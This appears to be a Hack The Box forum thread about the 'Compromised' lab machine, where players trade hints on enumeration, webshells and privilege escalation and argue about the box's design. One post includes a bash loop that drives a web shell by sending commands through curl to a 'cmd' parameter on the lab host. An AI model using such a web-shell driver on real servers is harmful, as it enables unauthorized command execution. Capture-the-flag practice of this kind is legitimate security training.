Official Compromised Discussion

I discovered a .sh***p file in the downloaded archive. However, when opening it in a browser it gives a blank page, and with curl I get a 404. It’s a rabbit hole I guess, or is it not?

Ok, have RCE, but not reverse shell. I would appreciate a hint or some sake where I lost it.

@solid5n4k3 said:

Ok, have RCE, but not reverse shell. I would appreciate a hint or some sake where I lost it.

The box can be done without having a reverse shell.
If you have RCE and not just P** CE, you can assume that something is blocking you from getting one.

Spoiler Removed

@sparkla said:

Once you got rce, here’s a little script you can use. It’s almost like a real shell :smiley:
(Your script must support a get param named cmd)

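#!/bin/bash
# Prompt for a command and send it to the web shell as the "cmd" GET parameter.

cmd=''
while [[ $cmd != 'exit' ]];
do
        # -r keeps backslashes literal; stop on EOF (Ctrl-D) instead of looping forever
        read -r -p '$ > ' cmd || break
        curl -G http://compromised.htb/findThePathYourself/your-cmd-shell.php --data-urlencode "cmd=$cmd"
done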

Thank you

Got root. Needed a few nudges for root but got there in the end. If you need help let me know

I finally managed to get command execution, with a very limited shell. Don’t quite know where to go from here…

Rooted. What a ride.

Thank you @D4nch3n for a fun box. The hardest part for me was getting the first user. Once I figured out what things were “left behind” I was able to progress quicker.

User->root was very nifty. I definitely went down more than a couple of rabbit holes before I figured out where the attackers had left their calling card.

@zilwah said:

Spoiler Removed

why ?? this was a simple *nix command not specifically related to any machine, vuln or exploit ?

For anyone feeling lost in the bac**p files, what made it super easy for me is to think which files were modified when and keep your eyes peeled. Could shave some time off of your file-diving :wink:

Finally rooted. This one requires you to take care with your enumeration. I needed two nudges for user that I wouldn’t have if I had been more thorough and thoughtful.

My only other piece of advice is to practice your file searching tools (grep, find, etc). They will help you a lot. I agree with @HumanFlyBzzzz

PM me if you need nudges. Let me know what you’ve tried so I don’t spoil anything.
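The advice in the posts above (think about which files were modified when, and practice grep and find) can be turned into a repeatable triage step. The following is an added example, not part of the original thread: it assumes GNU find and GNU touch, and the function names, sample tree, dates and file contents are all constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: triage an extracted backup by modification time.
# Function names, paths, dates and file contents are constructed for illustration.
# Assumes GNU find and GNU touch.

# Print "YYYY-MM-DD path" for each file whose mtime day differs from the
# most common mtime day in the tree (taken as the original deploy date).
mtime_outliers() {
    local root="$1" baseline
    baseline=$(find "$root" -type f -printf '%TY-%Tm-%Td\n' |
        sort | uniq -c | sort -rn | awk 'NR==1 {print $2}')
    find "$root" -type f -printf '%TY-%Tm-%Td %p\n' |
        awk -v b="$baseline" '$1 != b' | sort
}

# Of those outliers, list the files whose content matches an extended regex.
grep_outliers() {
    local root="$1" pattern="$2"
    mtime_outliers "$root" | cut -d' ' -f2- |
        while IFS= read -r f; do
            grep -l -E -- "$pattern" "$f" || true
        done
}

# Constructed sample: three files from the deploy date, one edited months later.
make_sample() {
    local d
    d=$(mktemp -d)
    mkdir -p "$d/app/includes"
    printf '<?php echo "home";\n' > "$d/app/index.php"
    printf '<?php $db = "shop";\n' > "$d/app/includes/config.php"
    printf '<?php function h($s) { return $s; }\n' > "$d/app/includes/lib.php"
    printf '<?php $x = base64_decode("c2FtcGxl");\n' > "$d/app/includes/footer.php"
    touch -d '2020-05-01 10:00' "$d/app/index.php" \
        "$d/app/includes/config.php" "$d/app/includes/lib.php"
    touch -d '2020-09-03 02:14' "$d/app/includes/footer.php"
    echo "$d"
}

sample=$(make_sample)
mtime_outliers "$sample"                       # files changed after the baseline
grep_outliers "$sample" 'base64_decode|eval\(' # narrowed by content
rm -rf "$sample"
```

Modification times only survive if the archive was extracted with timestamps preserved, and they can be reset by whoever edited the file, so treat an empty result as inconclusive rather than clean.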

Accidentally reset my entire desktop and panels while messing around waiting for nmap to finish. Spent the last 45 min trying to get everything fixed. Can finally start this box now

I have grepped everything in existence where tf is this thing… I know you’re somewhere…

Edit: can someone give me a nudge? I seriously can’t find this

Edit 2: I was using the IP for feline the entire time *facepalm*

The shell script from @sparkla is very cool once you get a working webshell. Feels like a real shell, including proper formatting.

Stuck moving forward from here though.

Update: Moved forward, thanks to some nudges from @GPLO and @metuldann. Learned a new technique. Now on to the next user.

Update 2: Managed to get the user flag. Now trying for root. So far haven’t found anything “left behind” which can help me - any advice about where to look would be appreciated.

Found something. Now just need to make it work.

Finally got root. The last part is very cool. Thanks @D4nch3n for a great box - I learned a lot.

@sparkla said:

Again I decided against knowing better to try & move forward from the pseudo-shell to my user. I had some “fun” but still unable to make anything out of it.

My initial prediction remained true, whatever is supposed to work here seems to work only in a very specific way, you’re either lucky enough to find it or you aren’t - for me this has little to do with hacking.

Many hours wasted, learned nothing new, not the type of box I like to play here. Trollbox, Guessbox, Mysterybox, whatever you wanna call it. Not a Hackbox.

Aren’t half the boxes like this anyway?
I thought it was a good box. Some known vulns, some adapted vulns etc.
It’s all learning!!
Must say I couldn’t have rooted without help though!

@sparkla said:

Again, first blood happened like nothing was wrong, the missing link was spread through forum messages, probably initiated by the creator. I asked “why” we’re having to endure such frustrating experiences and never got a real answer. That’s what I call a Trollbox. Creators intentionally trolling players or not telling the reason why they do it.

I’ve had this feeling for quite a while, that first blood has become a total BSh.t. Creators, moderators, other HTB staff, their friends and friends of friends. This is what it looks like and how it works. This is a commercial project in many aspects (not only the simple and straightforward) and the owners apparently think that this way is the best one. You just need to filter out what has value from total garbage, forget about first blood, and I can guarantee you that you will feel way better immediately.

Anyone else getting an unresponsive webshell?

nvm

When I upload a file with the vq***, the web interface crashes… but I’m still able to do some directory browsing on the website… is that behavior intended?

Please stop uploading files; it crashes the server and has nothing to do with the exploit.